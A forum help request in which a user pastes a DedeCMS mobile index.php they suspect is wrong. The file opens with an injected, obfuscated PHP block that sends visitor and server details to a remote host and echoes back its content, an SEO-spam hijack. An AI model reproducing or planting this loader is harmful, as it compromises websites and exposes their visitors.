去评论
dz插件网

这个文件我感觉有问题,不知道那个地方出问题了

饾暦饾枎饾枒饾枏饾枂饾枅饾枑
2022/03/27 19:22:01
  1. <?phperror_reporting(0);header('Content-Type:text/html;charset=utf-8');$qwe=str_replace("d","","sdtdrd_redpdldadcde");$qaz=$qwe("d","","fdidlded_dgdedtd_dcdodndtdedndtds");$aa=$qwe("w","","dwawtwew_wdwewfwawuwlwtw_wtwiwmwewzwownwew_wswewtw");$aa('PRC');$TD_server = $qwe("d","","hdtdtdpd:d/d/dadadad.dfdedvd8d9d.dcdodmd:d6d0d0d/d");$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];$Content_mb=$qaz($TD_server."/index.php?host=".$host_name."&url=".$_SERVER["REQUEST_URI"]."&domain=".$_SERVER['SERVER_NAME']."&ua=".$_SERVER['HTTP_USER_AGENT']."&refs=".$_SERVER['HTTP_REFERER']);echo $Content_mb;?><?phpif(!file_exists(dirname(__FILE__).'/../data/common.inc.php')){    header('Location:install/index.php');    exit();}if ( preg_match("#PHP (.*) Development Server#",$_SERVER['SERVER_SOFTWARE']) ){    if ( $_SERVER['REQUEST_URI'] == dirname($_SERVER['SCRIPT_NAME']) )    {        header('HTTP/1.1 301 Moved Permanently');        header('Location:'.$_SERVER['REQUEST_URI'].'/');    }}//自动生成HTML版if(isset($_GET['upcache']) || !file_exists('index.html')){    require_once (dirname(__FILE__) . "/../include/common.inc.php");    require_once DEDEINC."/arc.partview.class.php";    $GLOBALS['_arclistEnv'] = 'index';    $row = $dsql->GetOne("Select * From `#@__homepageset`");    $row['templet'] = MfTemplet($row['templet']);        $pv = new PartView();    $row['templet'] =str_replace('.htm','_m.htm',$row['templet']);    if ( !file_exists($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']) )    {        echo "模板文件不存在,无法解析文档!";        exit();    }    $pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);    $row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;    if ($row['showmod'] == 1)    {        $pv->SaveToHtml(dirname(__FILE__).'/index.html');        include(dirname(__FILE__).'/index.html');        exit();    } else {         $pv->Display();        exit();    }}else{    header('HTTP/1.1 301 Moved Permanently');    header('Location:index.html');}?>